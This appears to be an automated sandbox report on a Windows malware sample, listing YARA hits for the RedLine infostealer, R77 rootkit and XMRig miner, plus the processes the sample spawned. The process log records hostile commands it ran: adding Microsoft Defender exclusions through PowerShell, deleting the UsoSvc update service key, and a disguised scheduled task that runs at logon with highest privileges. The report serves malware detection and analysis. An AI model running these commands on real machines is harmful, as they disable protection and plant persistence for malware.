Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe	Code function: 0_2_004042F0	0_2_004042F0
Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe	Code function: 0_2_0040CE3C	0_2_0040CE3C
Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe	Code function: 0_2_0040C8F8	0_2_0040C8F8
Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe	Code function: 0_2_0040DCA1	0_2_0040DCA1
Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe	Code function: 0_2_0040B753	0_2_0040B753
Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe	Code function: 0_2_00418760	0_2_00418760
Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe	Code function: 0_2_0040F572	0_2_0040F572
Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe	Code function: 0_2_0040D380	0_2_0040D380
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 6_2_00007FF652B23170	6_2_00007FF652B23170
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 6_2_00007FF652B21770	6_2_00007FF652B21770
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 6_2_00007FF652B42510	6_2_00007FF652B42510
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 6_2_00007FF652B229D0	6_2_00007FF652B229D0
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 6_2_00007FF652B26EE0	6_2_00007FF652B26EE0
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_003AF04D	43_2_003AF04D
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_003F9090	43_2_003F9090

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

Source: brave.exe.2.dr	Static PE information: Number of sections : 11 > 10
Source: updater.exe.6.dr	Static PE information: Number of sections : 11 > 10
Source: 5528.tmp.67.dr	Static PE information: Number of sections : 11 > 10

Source: hZDPlQwZ9D.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 61.2.powershell.exe.1cd24a3dc18.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 65.0.dllhost.exe.14001e0b0.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 65.0.dllhost.exe.14001e0b0.13.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 65.0.dllhost.exe.14001e0b0.11.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 65.0.dllhost.exe.140000000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 61.2.powershell.exe.1cd24af6f58.11.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 65.0.dllhost.exe.140000000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 13.0.ofg.exe.ea0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 61.2.powershell.exe.1cd24ad3720.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 68.0.winlogon.exe.254b29d0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 65.0.dllhost.exe.14001e0b0.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 61.2.powershell.exe.1cd24a3dc18.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 0.2.hZDPlQwZ9D.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 65.0.dllhost.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 61.2.powershell.exe.1cd24ab9470.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 65.0.dllhost.exe.140000000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 65.0.dllhost.exe.140000000.12.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 68.0.winlogon.exe.254b29d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 12.2.chrome.exe.13548d0.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_Unsigned_GoogleUpdate date = 2019-08-05, author = Florian Roth, description = Detects suspicious unsigned GoogleUpdate.exe, score = 5aa84aa5c90ec34b7f7d75eb350349ae3aa5060f3ad6dd0520e851626e9f8354, reference = Internal Research
Source: 65.0.dllhost.exe.140000000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 65.0.dllhost.exe.14001e0b0.13.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 37.0.GoogleUpdate.exe.e40000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_Unsigned_GoogleUpdate date = 2019-08-05, author = Florian Roth, description = Detects suspicious unsigned GoogleUpdate.exe, score = 5aa84aa5c90ec34b7f7d75eb350349ae3aa5060f3ad6dd0520e851626e9f8354, reference = Internal Research
Source: 0.3.hZDPlQwZ9D.exe.700000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 65.0.dllhost.exe.14001e0b0.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 0.2.hZDPlQwZ9D.exe.413788.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 61.2.powershell.exe.1cd24af6f58.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 61.2.powershell.exe.1cd24ab9470.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 65.0.dllhost.exe.14001e0b0.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 8.0.ofg.exe.ea0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 65.0.dllhost.exe.14001e0b0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 65.0.dllhost.exe.140000000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 65.0.dllhost.exe.140000000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 65.0.dllhost.exe.140000000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 65.0.dllhost.exe.140000000.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 61.2.powershell.exe.1cd24ad3720.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 61.2.powershell.exe.1cd249d2c18.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 61.2.powershell.exe.1cd249e7ac8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 00000044.00000000.554210864.00000254B29D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 00000041.00000000.537508242.000000014001C000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 0000003D.00000002.635145721.000001CD24AB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 0000003D.00000002.633336710.000001CD249D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 00000041.00000000.541258672.000000014001C000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 00000041.00000000.535294108.000000014001C000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 00000041.00000000.539459041.000000014001C000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: Process Memory Space: powershell.exe PID: 1880, type: MEMORYSTR	Matched rule: SUSP_Obfuscted_PowerShell_Code date = 2018-12-13, author = Florian Roth, description = Detects obfuscated PowerShell Code, reference = https://twitter.com/silv0123/status/1073072691584880640
Source: C:\Users\user\AppData\Local\Google\ofg.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: C:\Windows\Temp\571D.tmp, type: DROPPED	Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File deleted: C:\Windows\Temp\__PSScriptPolicyTest_v3qooxmw.psn.ps1

Source: C:\Users\user\AppData\Local\Google\chrome.exe

File created: C:\Windows\GoogleUpdate.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: String function: 00007FF652B52490 appears 59 times
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: String function: 00007FF652B51250 appears 107 times

Source: C:\Users\user\AppData\Local\Google\brave.exe

Code function: 6_2_00007FF652B24C80 NtClose,

6_2_00007FF652B24C80

Source: 54A0.tmp.6.dr

Static PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

Source: hZDPlQwZ9D.exe	Binary or memory string: OriginalFilename vs hZDPlQwZ9D.exe
Source: hZDPlQwZ9D.exe, 00000000.00000000.295014817.0000000000437000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamePep* vs hZDPlQwZ9D.exe
Source: hZDPlQwZ9D.exe, 00000000.00000002.303608357.0000000000414000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSaintish.exe4 vs hZDPlQwZ9D.exe
Source: hZDPlQwZ9D.exe, 00000000.00000003.293548745.0000000000724000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSaintish.exe4 vs hZDPlQwZ9D.exe
Source: hZDPlQwZ9D.exe	Binary or memory string: OriginalFilenamePep* vs hZDPlQwZ9D.exe

Source: hZDPlQwZ9D.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

File created: C:\Users\user\AppData\Local\Yandex

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.mine.winEXE@99/39@5/5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Google\brave.exe

Code function: 6_2_00007FF652B2F6C0 GetLastError,FormatMessageA,IsDebuggerPresent,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,LocalFree,

6_2_00007FF652B2F6C0

Source: C:\Users\user\AppData\Local\Google\brave.exe

File created: C:\Program Files\Google\Chrome\updater.exe

Jump to behavior

Source: hZDPlQwZ9D.exe	Virustotal: Detection: 27%
Source: hZDPlQwZ9D.exe	ReversingLabs: Detection: 61%

Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\hZDPlQwZ9D.exe C:\Users\user\Desktop\hZDPlQwZ9D.exe
Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 132
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Users\user\AppData\Local\Google\brave.exe "C:\Users\user\AppData\Local\Google\brave.exe"
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Users\user\AppData\Local\Google\ofg.exe "C:\Users\user\AppData\Local\Google\ofg.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Google\ofg.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\ofg.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
